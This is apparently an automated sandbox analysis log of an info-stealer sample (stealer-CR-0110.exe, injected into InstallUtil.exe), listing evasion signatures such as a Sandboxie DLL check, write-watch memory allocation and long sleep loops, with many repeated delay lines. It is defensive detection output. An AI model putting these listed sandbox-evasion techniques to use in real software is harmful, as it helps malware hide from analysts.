Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory allocated: 4A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory allocated: 4A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 4930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 5D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 6D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596698	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598883	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596310	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596029	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595445	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593327	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Window / User API: threadDelayed 4959	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Window / User API: threadDelayed 4684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Window / User API: threadDelayed 2712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Window / User API: threadDelayed 3057	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 4411	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5390	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6004	Thread sleep count: 4959 > 30	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 1412	Thread sleep count: 4684 > 30	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6428	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284	Thread sleep count: 2712 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284	Thread sleep count: 3057 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599076s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598966s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598712s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598244s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596698s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596567s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596230s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595982s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300	Thread sleep count: 4411 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300	Thread sleep count: 5390 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598998s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598883s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598773s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598664s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597193s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596699s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596432s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596153s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596029s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595918s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595696s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595445s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595335s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594303s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593873s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593764s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593327s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 600000	Jump to behavior
